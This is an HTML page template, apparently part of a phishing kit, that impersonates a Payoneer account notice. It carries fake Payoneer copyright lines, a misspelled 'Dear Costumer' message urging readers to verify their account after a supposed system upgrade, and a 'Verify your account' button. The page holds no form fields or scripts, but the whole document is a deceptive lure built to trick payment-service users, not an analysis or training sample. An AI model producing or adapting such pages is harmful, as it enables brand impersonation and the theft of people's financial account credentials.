<!DOCTYPE html>
<html>
<head>
	<title>
		{{ pagetitle }}
	</title>
	<link rel="icon" href="/home/amine/Videos/99.png" >
	<style type="text/css">
		body{
			background-color: #FFFFFF;
		}
		.payonner{
		background-color: #0F0F0F0F;
			width: 700px;
			height: 400px;
			top:150px; 
			left:330px;
			position: absolute;
		}
		.p{
			font-size: 30px;
			font-family: courier;
		}
		.ul{
			font-size: 16px;
			font-family: courier;
		}
		.payonner input[type="submit"]
		{
			font-size: 15px;
			border-radius: 13px;
			height: 40px;
			background-color: #DF7401;
		}
		hr{
			width: 120px;
		}
		small{
			color: #585858;
		}
		.payonner input[type="submit"]:hover
		{
			cursor: pointer;
			background:#ffc107;
		}
	</style>
</head>
<body>
	<center><img src="/home/amine/Videos/qqqqqq.jpeg"></center>
	<div class="payonner">
		<center>
			<p class="p">You have requested to check your account</p><hr>
		</center>
		<ul>Dear Costumer,</ul>
		<ul class="ul">On the occasion of the New Year, we ask your honor to verify your account quickly because we recently made some adjustments and fixed a lot of errors and we fear that there is something wrong during the upgrade of our system Please verify your account and call if there is an error in your account.</ul><br>
		<center>
			<input type="submit" name="verify" value="Verify your account">
		</center>
		<br><br><br>
		<center>
			<small>© www.payoneer.com</small>
		</center>
		<small>© 2005-2021 Payoneer Inc.</small><br>
		<small>© All Rights Reserved.</small>
	</div>
</body>
</html>